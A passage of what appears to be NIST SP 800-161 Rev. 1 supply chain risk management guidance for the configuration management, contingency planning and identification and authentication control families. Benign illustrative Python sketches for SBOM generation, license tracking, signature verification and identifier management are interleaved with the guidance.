SDLC. This control supports traceability for C-SCRM. The below NIST SP 800-53, Rev. 5 control
enhancements – CM-3 (1), (2), (4), and (8) – are mechanisms that can be used for C-SCRM to collect and
manage change control data. Enterprises should require their prime contractors to implement this control
and flow down this requirement to relevant sub-tier contractors. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
(1) CONFIGURATION CHANGE CONTROL | AUTOMATED DOCUMENTATION, NOTIFICATION, AND PROHIBITION OF CHANGES
Supplemental C-SCRM Guidance: Enterprises should define a set of system changes that are critical to
the protection of the information system and the underlying or interoperating systems and networks.
These changes may be defined based on a criticality analysis (including components, processes, and
functions) and where vulnerabilities exist that are not yet remediated (e.g., due to resource constraints).
The change control process should also monitor for changes that may affect an existing security
control to ensure that this control continues to function as required.
Level(s): 2, 3
(2) CONFIGURATION CHANGE CONTROL | TESTING, VALIDATION, AND DOCUMENTATION OF CHANGES
Supplemental C-SCRM Guidance: Test, validate, and document changes to the system before
finalizing implementation of the changes.
Level(s): 2, 3
(3) CONFIGURATION CHANGE CONTROL | SECURITY AND PRIVACY REPRESENTATIVES
Supplemental C-SCRM Guidance: Require enterprise security and privacy representatives to be
members of the configuration change control function.
Level(s): 2, 3
(4) CONFIGURATION CHANGE CONTROL | PREVENT OR RESTRICT CONFIGURATION CHANGES
Supplemental C-SCRM Guidance: Prevent or restrict changes to the configuration of the system under
enterprise-defined circumstances.
Level(s): 2, 3
CM-4 IMPACT ANALYSIS
Supplemental C-SCRM Guidance: Enterprises should consider changes to the information system and
underlying or interoperable systems and networks to determine whether the impact of
these changes affects existing security controls and warrants additional or different protection to maintain
an acceptable level of cybersecurity risk throughout the supply chain. Ensure that stakeholders, such as
system engineers and system security engineers, are included in the impact analysis activities to provide
their perspectives for C-SCRM. NIST SP 800-53, Rev. 5 control enhancement CM-4 (1) is a mechanism
that can be used to protect the information system from vulnerabilities that may be introduced through the
test environment.
Level(s): 3
(1) IMPACT ANALYSES | SEPARATE TEST ENVIRONMENTS
Analyze changes to the system in a separate test environment before implementing them into an
operational environment, and look for security and privacy impacts due to flaws, weaknesses,
incompatibility, or intentional malice.
Level(s): 3
Related Control(s): SA-11, SC-7
CM-5 ACCESS RESTRICTIONS FOR CHANGE
Supplemental C-SCRM Guidance: Enterprises should ensure that requirements regarding physical and
logical access restrictions for changes to the information systems and networks are defined and included in
the enterprise’s implementation of access restrictions. Examples include access restriction for changes to
centrally managed processes for software component updates and the deployment of updates or patches.
Level(s): 2, 3
Control Enhancements:
ACCESS RESTRICTIONS FOR CHANGE | AUTOMATED ACCESS ENFORCEMENT AND AUDIT RECORDS
Supplemental C-SCRM Guidance: Enterprises should implement mechanisms to ensure automated
access enforcement and auditing of the information system and the underlying systems and networks.
Level(s): 3
ACCESS RESTRICTIONS FOR CHANGE | LIMIT LIBRARY PRIVILEGES
Supplemental C-SCRM Guidance: Enterprises should note that software libraries may be considered
configuration items, access to which should be managed and controlled.
Level(s): 3
CM-6 CONFIGURATION SETTINGS
Supplemental C-SCRM Guidance: Enterprises should oversee the function of modifying configuration
settings for their information systems and networks and throughout the SDLC. Methods of oversight
include periodic verification, reporting, and review. Resulting information may be shared with various
parties that have access to, are connected to, or engage in the creation of the enterprise’s information
systems and networks on a need-to-know basis. Changes should be tested and approved before they are
implemented. Configuration settings should be monitored and audited to alert designated enterprise
personnel when a change has occurred. Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors. Departments and agencies should
refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1) CONFIGURATION SETTINGS | AUTOMATED MANAGEMENT, APPLICATION, AND VERIFICATION
Supplemental C-SCRM Guidance: The enterprise should, when feasible, employ automated
mechanisms to manage, apply, and verify configuration settings.
Level(s): 3
(2) CONFIGURATION SETTINGS | RESPOND TO UNAUTHORIZED CHANGES
Supplemental C-SCRM Guidance: The enterprise should ensure that designated security or IT
personnel are alerted to unauthorized changes to configuration settings. When suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers are
responsible for such unauthorized changes, this qualifies as a C-SCRM incident that should be
recorded and tracked to monitor trends. For a more comprehensive view, a specific, predefined set of
C-SCRM stakeholders should assess the impact of unauthorized changes in the supply chain. When
impact is assessed, relevant stakeholders should help define and implement appropriate mitigation
strategies to ensure a comprehensive resolution.
Level(s): 3
CM-7 LEAST FUNCTIONALITY
Supplemental C-SCRM Guidance: Least functionality reduces the attack surface. Enterprises should select
components that allow the flexibility to specify and implement least functionality. Enterprises should
ensure least functionality in their information systems and networks and throughout the SDLC. The NIST SP
800-53, Rev. 5 control enhancement CM-7 (9) is a mechanism that can be used to protect information systems
and networks from vulnerabilities that may be introduced when unauthorized hardware is connected
to enterprise systems. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 3
Control Enhancement(s):
(1) LEAST FUNCTIONALITY | PERIODIC REVIEW
Supplemental C-SCRM Guidance: Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors.
Level(s): 2, 3
(2) LEAST FUNCTIONALITY | UNAUTHORIZED SOFTWARE
Supplemental C-SCRM Guidance: Enterprises should define requirements and deploy appropriate
processes to specify and detect software that is not allowed. This can be aided by defining a
requirement to, at a minimum, not use disreputable or unauthorized software. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant
sub-tier contractors.
Level(s): 2, 3
(3) LEAST FUNCTIONALITY | AUTHORIZED SOFTWARE
Supplemental C-SCRM Guidance: Enterprises should define requirements and deploy appropriate
processes to specify allowable software. This can be aided by defining a requirement to use only
reputable software. This can also include requirements for alerts when new software and updates to
software are introduced into the enterprise’s environment. An example of such requirements is to allow
open source software only if the code is available for an enterprise’s evaluation and determined to be
acceptable for use.
Level(s): 3
(4) LEAST FUNCTIONALITY | CONFINED ENVIRONMENTS WITH LIMITED PRIVILEGES
Supplemental C-SCRM Guidance: The enterprise should ensure that code authentication mechanisms
such as digital signatures are implemented when executing code to assure the integrity of software,
firmware, and information on the information systems and networks.
Level(s): 2, 3
(5) LEAST FUNCTIONALITY | BINARY OR MACHINE EXECUTABLE CODE
Supplemental C-SCRM Guidance: The enterprise should obtain binary or machine-executable code
directly from the OEM/developer or other acceptable, verified source.
Level(s): 3
(6) LEAST FUNCTIONALITY | BINARY OR MACHINE EXECUTABLE CODE
Supplemental C-SCRM Guidance: When exceptions are made to use software products without
accompanying source code and with limited or no warranty because of compelling mission or
operational requirements, approval by the authorizing official should be contingent upon the enterprise
explicitly incorporating cybersecurity supply chain risk assessments as part of a broader assessment of
such software products, as well as the implementation of compensating controls to address any
identified and assessed risks.
Level(s): 2, 3
(7) LEAST FUNCTIONALITY | PROHIBITING THE USE OF UNAUTHORIZED HARDWARE
Enterprises should define requirements and deploy appropriate processes to specify and detect
hardware that is not allowed. This can be aided by defining a requirement to, at a minimum, not use
disreputable or unauthorized hardware. Enterprises should require their prime contractors to implement
this control and flow down this requirement to relevant sub-tier contractors.
Level(s): 2, 3
CM-8 SYSTEM COMPONENT INVENTORY
Supplemental C-SCRM Guidance: Enterprises should ensure that critical component assets within the
information systems and networks are included in the asset inventory. The inventory must also include
information for critical component accountability. Inventory information includes, for example, hardware
inventory specifications, software license information, software version numbers, component owners, and –
for networked components or devices – machine names and network addresses. Inventory specifications
may include the manufacturer, device type, model, serial number, and physical location. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant sub-
tier contractors. Enterprises should specify the requirements and how information flow is enforced to
ensure that only the required information – and no more – is communicated to the various participants in
the supply chain. If information is subsetted downstream, a record should identify who created the
subset. Enterprises should consider producing SBOMs for applicable and appropriate
classes of software, including purchased software, open source software, and in-house software.
Departments and agencies should refer to Appendix F for additional guidance on SBOMs in accordance
with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1) SYSTEM COMPONENT INVENTORY | UPDATES DURING INSTALLATION AND REMOVAL
Supplemental C-SCRM Guidance: When installing, updating, or removing an information system,
information system component, or network component, the enterprise needs to update the inventory to
ensure traceability for tracking critical components. In addition, the information system’s configuration
needs to be updated to ensure an accurate inventory of supply chain protections and then re-baselined
accordingly.
Level(s): 3
(2) SYSTEM COMPONENT INVENTORY | AUTOMATED MAINTENANCE
Supplemental C-SCRM Guidance: The enterprise should implement automated maintenance
mechanisms to ensure that changes to component inventory for the information systems and networks
are monitored for installation, update, and removal. When automated maintenance is performed with a
predefined frequency and with the automated collation of relevant inventory information about each
defined component, the enterprise should ensure that updates are available to relevant stakeholders for
evaluation. Predefined frequencies for data collection should be less predictable in order to reduce the
risk of an insider threat bypassing security mechanisms.
Level(s): 3
(3) SYSTEM COMPONENT INVENTORY | ACCOUNTABILITY INFORMATION
Supplemental C-SCRM Guidance: The enterprise should ensure that accountability information is
collected for information system and network components. The system/component inventory
information should identify those individuals who originate an acquisition as well as intended end
users, including any associated personnel who may administer or use the system/components.
Level(s): 3
(4) SYSTEM COMPONENT INVENTORY | ASSESSED CONFIGURATIONS AND APPROVED DEVIATIONS
Supplemental C-SCRM Guidance: Assessed configurations and approved deviations must be
documented and tracked. Any changes to the baseline configurations of information systems and
networks require a review by relevant stakeholders to ensure that the changes do not result in increased
exposure to cybersecurity risks throughout the supply chain.
Level(s): 3
(5) SYSTEM COMPONENT INVENTORY | CENTRALIZED REPOSITORY
Supplemental C-SCRM Guidance: Enterprises may choose to implement centralized inventories that
include components from all enterprise information systems, networks, and their components.
Centralized repositories of inventories provide opportunities for efficiencies in accounting for
information systems, networks, and their components. Such repositories may also help enterprises
rapidly identify the location and responsible individuals of components that have been compromised,
breached, or are otherwise in need of mitigation actions. The enterprise should ensure that centralized
inventories include the supply chain-specific information required for proper component accountability
(e.g., supply chain relevance and information system, network, or component owner).
Level(s): 3
(6) SYSTEM COMPONENT INVENTORY | AUTOMATED LOCATION TRACKING
Supplemental C-SCRM Guidance: When employing automated mechanisms for tracking information
system components by physical location, the enterprise should incorporate information system,
network, and component tracking needs to ensure accurate inventory.
Level(s): 2, 3
(7) SYSTEM COMPONENT INVENTORY | ASSIGNMENT OF COMPONENTS TO SYSTEMS
Supplemental C-SCRM Guidance: When assigning components to systems, the enterprise should
ensure that the information systems and networks with all relevant components are inventoried,
marked, and properly assigned. This facilitates quick inventory of all components relevant to
information systems and networks and enables tracking of components that are considered critical and
require differentiating treatment as part of the information system and network protection activities.
Level(s): 3
(8) SYSTEM COMPONENT INVENTORY | SBOMS FOR OPEN SOURCE PROJECTS
Supplemental C-SCRM Guidance: If an enterprise uses an open source project that does not have an
SBOM and the enterprise requires one, the enterprise will need to 1) contribute SBOM generation to
the open source project, 2) contribute resources to the project to add this capability, or 3) generate an
SBOM on their first consumption of each version of the open source project that they use.
Level(s): 3
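
As a purely illustrative sketch of option 3 above, the following generates a minimal CycloneDX-style SBOM for a single consumed artifact. Real SBOMs enumerate transitive components as well; all values here are hypothetical.

    import hashlib
    import json
    import uuid
    from datetime import datetime, timezone

    def minimal_sbom(name, version, artifact_path):
        """Build a minimal CycloneDX 1.4-style SBOM describing one
        consumed open source artifact and its SHA-256 digest."""
        with open(artifact_path, "rb") as f:
            digest = hashlib.sha256(f.read()).hexdigest()
        return {
            "bomFormat": "CycloneDX",
            "specVersion": "1.4",
            "serialNumber": f"urn:uuid:{uuid.uuid4()}",
            "metadata": {"timestamp": datetime.now(timezone.utc).isoformat()},
            "components": [{
                "type": "library",
                "name": name,
                "version": version,
                "hashes": [{"alg": "SHA-256", "content": digest}],
            }],
        }

    # print(json.dumps(minimal_sbom("left-pad", "1.3.0",
    #                               "left-pad-1.3.0.tgz"), indent=2))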
CM-9 CONFIGURATION MANAGEMENT PLAN
Supplemental C-SCRM Guidance: Enterprises should ensure that C-SCRM is incorporated into
configuration management planning activities. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors.
Level(s): 2, 3
Control Enhancement(s):
(1) CONFIGURATION MANAGEMENT PLAN | ASSIGNMENT OF RESPONSIBILITY
Supplemental C-SCRM Guidance: Enterprises should ensure that all relevant roles are defined to
address configuration management activities for information systems and networks. Enterprises should
ensure that requirements and capabilities for configuration management are appropriately addressed or
included in the following supply chain activities: requirements definition, development, testing, market
research and analysis, procurement solicitations and contracts, component installation or removal,
system integration, operations, and maintenance.
Level(s): 2, 3
CM-10 SOFTWARE USAGE RESTRICTIONS
Supplemental C-SCRM Guidance: Enterprises should ensure that licenses for software used within their
information systems and networks are documented, tracked, and maintained. Tracking mechanisms should
provide for the ability to trace users and the use of licenses to access control information and processes. As
an example, when an employee is terminated, a “named user” license should be revoked, and the license
documentation should be updated to reflect this change. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1) SOFTWARE USAGE RESTRICTIONS | OPEN SOURCE SOFTWARE
Supplemental C-SCRM Guidance: When considering software, enterprises should review all options
and corresponding risks, including open source or commercially licensed components. When using
open source software (OSS), the enterprise should understand and review the open source
community’s typical procedures regarding provenance, configuration management, sources, binaries,
reusable frameworks, reusable libraries’ availability for testing and use, and any other information that
may impact levels of exposure to cybersecurity risks throughout the supply chain. Numerous open
source solutions are currently in use by enterprises, including in integrated development environments
(IDEs) and web servers. The enterprise should:
a. Track the use of OSS and associated documentation,
b. Ensure that the use of OSS adheres to the licensing terms and that these terms are acceptable to the enterprise,
c. Document and monitor the distribution of software as it relates to the licensing agreement to control copying and distribution, and
d. Evaluate and periodically audit the OSS’s supply chain as provided by the open source developer
(e.g., information regarding provenance, configuration management, use of reusable libraries,
etc.). This evaluation can be done through obtaining existing and often public documents, as well
as using experience based on software update and download processes in which the enterprise may
have participated.
Level(s): 2, 3
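
The CM-10 guidance above gives the example of revoking a "named user" license upon termination. A minimal illustrative sketch of such license tracking, with hypothetical names throughout, might be:

    class LicenseRegistry:
        """Track named-user licenses so that use can be traced to access
        control processes and revoked on personnel changes."""

        def __init__(self):
            self._licenses = {}   # (product, user) -> status

        def assign(self, product, user):
            self._licenses[(product, user)] = "active"

        def revoke_user(self, user):
            """Revoke every named-user license held by `user` and return
            the affected products so documentation can be updated."""
            affected = [p for (p, u), status in self._licenses.items()
                        if u == user and status == "active"]
            for product in affected:
                self._licenses[(product, user)] = "revoked"
            return affected

    registry = LicenseRegistry()
    registry.assign("cad-suite", "jdoe")
    print(registry.revoke_user("jdoe"))   # ['cad-suite']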
CM-11 USER-INSTALLED SOFTWARE
Supplemental C-SCRM Guidance: This control extends to the enterprise information system and network
users who are not employed by the enterprise. These users may be suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers.
Level(s): 2, 3
CM-12 INFORMATION LOCATION
Supplemental C-SCRM Guidance: Information that resides in different physical locations may be subject to
different cybersecurity risks throughout the supply chain, depending on the specific location of the
information. Components that originate or operate from different physical locations may also be subject to
different supply chain risks, depending on the specific location of origination or operations. Enterprises
should manage these risks by limiting access and specifying allowed or disallowed
geographic locations for backup/recovery, patching/upgrades, and information transfer/sharing. NIST SP
800-53, Rev. 5 control enhancement CM-12 (1) is a mechanism that can be used to enable automated
location of components.
Level(s): 2, 3
Control Enhancement(s):
(1) INFORMATION LOCATION | AUTOMATED TOOLS TO SUPPORT INFORMATION LOCATION
Use automated tools to identify enterprise-defined information on enterprise-defined system
components to ensure that controls are in place to protect enterprise information and individual
privacy.
Level(s): 2, 3
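
For illustration only, an enterprise-defined allow list of the kind CM-12 describes (limiting where backup/recovery, patching/upgrades, and information transfer may occur) could be checked as follows. The activities and location codes are hypothetical.

    ALLOWED_LOCATIONS = {
        "backup_recovery": {"US-EAST", "US-WEST"},
        "patching_upgrades": {"US-EAST"},
        "information_transfer": {"US-EAST", "EU-CENTRAL"},
    }

    def location_permitted(activity, location):
        """Check a proposed data action's geographic location against the
        enterprise-defined allow list before the action proceeds."""
        return location in ALLOWED_LOCATIONS.get(activity, set())

    assert location_permitted("patching_upgrades", "US-EAST")
    assert not location_permitted("backup_recovery", "EU-CENTRAL")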
CM-13 DATA ACTION MAPPING
Supplemental C-SCRM Guidance: In addition to personally identifiable information, understanding and
documenting a map of system data actions for sensitive or classified information is necessary. Data action
mapping should also be conducted to map Internet of Things (IoT) devices, embedded or stand-alone IoT
systems, or IoT system of system data actions. Understanding what classified or IoT information is being
processed, its sensitivity and/or effect on a physical thing or physical environment, how the sensitive or IoT
information is being processed (e.g., if the data action is visible to an individual or is processed in another
part of the system), and by whom provides a number of contextual factors that are important for assessing
the degree of risk. Data maps can be illustrated in different ways, and the level of detail may vary based on
the mission and business needs of the enterprise. The data map may be an overlay of any system design
artifact that the enterprise is using. The development of this map may necessitate coordination between
program and security personnel regarding the covered data actions and the components that are identified
as part of the system.
Level(s): 2, 3
CM-14 SIGNED COMPONENTS
Supplemental C-SCRM Guidance: Enterprises should verify that the acquired hardware and software
components are genuine and valid by using digitally signed components from trusted certificate authorities.
Verifying components before allowing installation helps enterprises reduce cybersecurity risks throughout
the supply chain.
Level(s): 3
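
As an illustrative sketch of CM-14's verify-before-install step, the following checks a vendor's signature over a component's digest before allowing installation. It assumes the third-party Python "cryptography" package and uses a raw Ed25519 key for brevity; production use would rely on certificates from trusted certificate authorities, as the control states.

    # Assumes the third-party "cryptography" package.
    import hashlib
    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric.ed25519 import (
        Ed25519PublicKey,
    )

    def component_is_genuine(artifact_path, signed_digest,
                             vendor_key: Ed25519PublicKey):
        """Recompute the artifact's SHA-256 and verify the vendor's
        signature over it; installation proceeds only on success."""
        with open(artifact_path, "rb") as f:
            digest = hashlib.sha256(f.read()).digest()
        try:
            vendor_key.verify(signed_digest, digest)
            return True
        except InvalidSignature:
            return False

    # if not component_is_genuine("driver.bin", sig, vendor_public_key):
    #     raise RuntimeError("reject installation: component not genuine")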
FAMILY: CONTINGENCY PLANNING
[FIPS 200] specifies the Contingency Planning minimum security requirement as follows:
Organizations must establish, maintain, and effectively implement plans for emergency
response, backup operations, and post-disaster recovery for organizational information
systems to ensure the availability of critical information resources and continuity of
operations in emergency situations.
Cybersecurity supply chain contingency planning includes planning for alternative suppliers of
system components, alternative suppliers of systems and services, alternative delivery routes for
critical system components, and denial-of-service attacks on the supply chain. Such contingency
plans help ensure that existing service providers have an effective continuity of operations plan,
especially when the provider is delivering services in support of a critical mission function.
Additionally, many techniques used for contingency planning, such as alternative processing
sites, have their own supply chains with their own attendant cybersecurity risks. Enterprises
should ensure that they understand and manage cybersecurity risks throughout the supply chain
and dependencies related to the contingency planning activities as necessary.
CP-1 POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should integrate C-SCRM into the contingency planning
policy and related SCRM Strategy/Implementation Plan, policies, and SCRM Plan. The policy should
cover information systems and the supply chain network and, at a minimum, address scenarios such as:
a. Unplanned component failure and subsequent replacement;
b. Planned replacement related to feature improvements, maintenance, upgrades, and modernization; and
c. Product and/or service disruption.
Level(s): 1, 2, 3
CP-2 CONTINGENCY PLAN
Supplemental C-SCRM Guidance: Enterprises should define and implement a contingency plan for the
supply chain information systems and network to ensure that preparations are in place to mitigate the loss
or degradation of data or operations. Contingencies should be put in place for the supply chain, network,
information systems (especially critical components), and processes to ensure protection against
compromise and provide appropriate failover and timely recovery to an acceptable state of operations.
Level(s): 2, 3
Control Enhancement(s):
(1) CONTINGENCY PLAN | COORDINATE WITH RELATED PLANS
Supplemental C-SCRM Guidance: Coordinate contingency plan development for supply chain risks
with enterprise elements responsible for related plans.
Level(s): 2, 3
(2) CONTINGENCY PLAN | CAPACITY PLANNING
Supplemental C-SCRM Guidance: This enhancement helps the availability of the supply chain
network or information system components.
Level(s): 2, 3
(3) CONTINGENCY PLAN | COORDINATE WITH EXTERNAL SERVICE PROVIDERS
Supplemental C-SCRM Guidance: Enterprises should ensure that the supply chain network,
information systems, and components provided by an external service provider have appropriate
failover (to include personnel, equipment, and network resources) to reduce or prevent service
interruption or ensure timely recovery. Enterprises should ensure that contingency planning
requirements are defined as part of the service-level agreement. The agreement may have specific
terms that address critical components and functionality support in case of denial-of-service attacks to
ensure the continuity of operations. Enterprises should coordinate with external service providers to
identify service providers’ existing contingency plan practices and build on them as required by the
enterprise’s mission and business needs. Such coordination will aid in cost reduction and efficient
implementation. Enterprises should require their prime contractors who provide a mission- and
business-critical or -enabling service or product to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 3
(4) CONTINGENCY PLAN | IDENTIFY CRITICAL ASSETS
Supplemental C-SCRM Guidance: Ensure that critical assets (including hardware, software, and
personnel) are identified and that appropriate contingency planning requirements are defined and
applied to ensure the continuity of operations. A key step in this process is to complete a criticality
analysis on components, functions, and processes to identify all critical assets. See Section 2 and
NISTIR 8179 for additional guidance on criticality analyses.
Level(s): 3
CP-3 CONTINGENCY TRAINING
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in
contingency training. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1) CONTINGENCY TRAINING | SIMULATED EVENTS
Supplemental C-SCRM Guidance: Enterprises should ensure that suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers who have
roles and responsibilities in providing critical services are included in contingency training exercises.
Level(s): 3
CP-4 CONTINGENCY PLAN TESTING
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in
contingency testing. The enterprise – in coordination with the service provider(s) – should test
continuity/resiliency capabilities, such as failover from a primary production site to a back-up site. This
testing may occur separately from a training exercise or be performed during the exercise. Enterprises
should reference their C-SCRM threat assessment output to develop scenarios to test how well the
enterprise is able to withstand and/or recover from a C-SCRM threat event.
Level(s): 2, 3
CP-6 ALTERNATIVE STORAGE SITE
Supplemental C-SCRM Guidance: When managed by suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers, alternative storage sites are
considered within an enterprise’s supply chain network. Enterprises should apply appropriate cybersecurity
supply chain controls to those storage sites.
Level(s): 2, 3
Control Enhancement(s):
(1) ALTERNATIVE STORAGE SITE | SEPARATION FROM PRIMARY SITE
Supplemental C-SCRM Guidance: This enhancement helps the resiliency of the supply chain network,
information systems, and information system components.
Level(s): 2, 3
CP-7 ALTERNATIVE PROCESSING SITE
Supplemental C-SCRM Guidance: When managed by suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers, alternative processing sites are
considered within an enterprise’s supply chain. Enterprises should apply appropriate supply chain
cybersecurity controls to those processing sites.
Level(s): 2, 3
CP-8 TELECOMMUNICATIONS SERVICES
Supplemental C-SCRM Guidance: Enterprises should incorporate alternative telecommunication service
providers for their supply chain to support critical information systems.
Level(s): 2, 3
Control Enhancement(s):
(1) TELECOMMUNICATIONS SERVICES | SEPARATION OF PRIMARY AND ALTERNATIVE PROVIDERS
Supplemental C-SCRM Guidance: The separation of primary and alternative providers supports
cybersecurity resilience of the supply chain.
Level(s): 2, 3
(2) TELECOMMUNICATIONS SERVICES | PROVIDER CONTINGENCY PLAN
Supplemental C-SCRM Guidance: For C-SCRM, the contingency plans of suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers should
provide separation in infrastructure, service, process, and personnel, where appropriate.
Level(s): 2, 3
CP-11 ALTERNATIVE COMMUNICATIONS PROTOCOLS
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in
contingency plans, training, and testing as part of incorporating alternative communications protocol
capabilities to establish supply chain resilience.
Level(s): 2, 3
FAMILY: IDENTIFICATION AND AUTHENTICATION
[FIPS 200] specifies the Identification and Authentication minimum security requirement as
follows:
Organizations must identify information system users, processes acting on behalf of
users, or devices and authenticate (or verify) the identities of those users, processes, or
devices, as a prerequisite to allowing access to organizational information systems.
NIST SP 800-161, Supply Chain Risk Management Practices for Federal Information Systems
and Organizations, expands the [FIPS 200] identification and authentication control family to
include the identification and authentication of components in addition to individuals (users) and
processes acting on behalf of individuals within the supply chain network. Identification and
authentication are critical to C-SCRM because they provide for the traceability of individuals,
processes acting on behalf of individuals, and specific systems/components in an enterprise’s
supply chain network. Identification and authentication are required to appropriately manage
cybersecurity risks throughout the supply chain to both reduce the risk of supply chain
cybersecurity compromise and to generate evidence in case of supply chain cybersecurity
compromise.
IA-1 POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The enterprise should – at enterprise-defined intervals – review,
enhance, and update their identity and access management policies and procedures to ensure that critical
roles and processes within the supply chain network are defined and that the enterprise’s critical systems,
components, and processes are identified for traceability. This should include the identity of critical
components that may not have been considered under identification and authentication in the past. Note
that providing identification for all items within the supply chain would be cost-prohibitive, and discretion
should be used. The enterprise should update related C-SCRM Strategy/Implementation Plan(s), Policies,
and C-SCRM Plans.
Level(s): 1, 2, 3
IA-2 IDENTIFICATION AND AUTHENTICATION (ORGANIZATIONAL USERS)
Supplemental C-SCRM Guidance: Enterprises should ensure that identification and authentication requirements are
defined and applied for enterprise users accessing an ICT/OT system or supply chain network. An
enterprise user may include employees, individuals deemed to have the equivalent status of employees
(e.g., contractors, guest researchers, etc.), and system integrators fulfilling contractor roles. Criteria such as
“duration in role” can aid in defining which identification and authentication mechanisms are used. The
enterprise may choose to define a set of roles and associate a level of authorization to ensure proper
implementation. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 1, 2, 3
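For illustration only (not part of the control text), the following minimal Python sketch shows one way an enterprise might encode role-based identification and authentication requirements, including a "duration in role" criterion; all role names, mechanisms, and durations are hypothetical:

# Hypothetical mapping of enterprise user roles to identification and
# authentication requirements (illustrative sketch, not prescribed by IA-2).
from dataclasses import dataclass

@dataclass(frozen=True)
class AuthRequirement:
    mechanism: str               # e.g., "PIV card + PIN" (assumed label)
    max_role_duration_days: int  # "duration in role" criterion

ROLE_REQUIREMENTS = {
    "employee": AuthRequirement("PIV card + PIN", 365),
    "guest_researcher": AuthRequirement("FIDO2 token", 90),
    "system_integrator": AuthRequirement("PIV-I card + PIN", 180),
}

def required_mechanism(role: str) -> AuthRequirement:
    """Return the authentication requirement defined for a role."""
    if role not in ROLE_REQUIREMENTS:
        raise ValueError(f"No authentication requirement defined for role: {role}")
    return ROLE_REQUIREMENTS[role]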
IA-3 DEVICE IDENTIFICATION AND AUTHENTICATION
Supplemental C-SCRM Guidance: Enterprises should implement capabilities to distinctly and positively
identify devices and software within their supply chain and, once identified, verify that the identity is
authentic. Devices that require unique device-to-device identification and authentication should be defined
by type, device, or a combination of type and device. Software that requires authentication should be
identified through a software identification tag (SWID) that enables verification of the software package
and authentication of the enterprise releasing the software package.
Level(s): 1, 2, 3
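As an illustrative sketch only (IA-3 does not prescribe an implementation), software identity might be checked by reading a SWID tag and comparing a package digest published by the releasing enterprise; the file paths, tag fields, and expected digest below are hypothetical:

# Illustrative sketch: read a SWID (ISO/IEC 19770-2) tag and verify a
# package digest against a supplier-published value. File names and the
# expected digest are hypothetical.
import hashlib
import xml.etree.ElementTree as ET

SWID_NS = "{http://standards.iso.org/iso/19770/-2/2015/schema.xsd}"

def read_swid_identity(tag_path: str) -> dict:
    """Extract the software name, version, and tag creator from a SWID tag."""
    root = ET.parse(tag_path).getroot()
    entity = root.find(f"{SWID_NS}Entity")
    return {
        "name": root.get("name"),
        "version": root.get("version"),
        "tag_creator": entity.get("name") if entity is not None else None,
    }

def verify_package_digest(package_path: str, expected_sha256: str) -> bool:
    """Compare the package's SHA-256 digest with the published value."""
    h = hashlib.sha256()
    with open(package_path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest() == expected_sha256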
IA-4 IDENTIFIER MANAGEMENT
Supplemental C-SCRM Guidance: Identifiers allow for greater discoverability and traceability. Within the
enterprise’s supply chain, identifiers should be assigned to systems, individuals, documentation, devices,
and components. In some cases, identifiers may be maintained throughout a system’s life cycle – from
concept to retirement – but, at a minimum, throughout the system’s life within the enterprise.
For software development, identifiers should be assigned for those components that have achieved
configuration item recognition. For devices and operational systems, identifiers should be assigned when
the items enter the enterprise’s supply chain, such as when they are transferred to the enterprise’s
ownership or control through shipping and receiving or via download.
Suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers typically use their own identifiers for tracking purposes within their own supply chain.
Enterprises should correlate those identifiers with the enterprise-assigned identifiers for traceability and
accountability. Enterprises should require their prime contractors to implement this control and flow down
this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: IA-3 (1), IA-3 (2), IA-3 (3), and IA-3 (4)
Control Enhancement(s):
(1) IDENTIFIER MANAGEMENT | CROSS-ORGANIZATION MANAGEMENT
Supplemental C-SCRM Guidance: This enhancement helps the traceability and provenance of
elements within the supply chain through the coordination of identifier management among the
enterprise and its suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers. This includes information systems and components as well as
individuals engaged in supply chain activities.
Level(s): 1, 2, 3
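A minimal illustrative sketch of the identifier correlation described above, in which supplier-assigned identifiers are cross-referenced with enterprise-assigned identifiers for traceability; all identifier formats and values are hypothetical:

# Illustrative identifier cross-reference: supplier-assigned identifiers
# are correlated with enterprise-assigned identifiers so that a component
# can be traced in either direction. All identifier values are hypothetical.
from datetime import date

class IdentifierRegistry:
    def __init__(self):
        self._by_enterprise_id = {}
        self._by_supplier_id = {}

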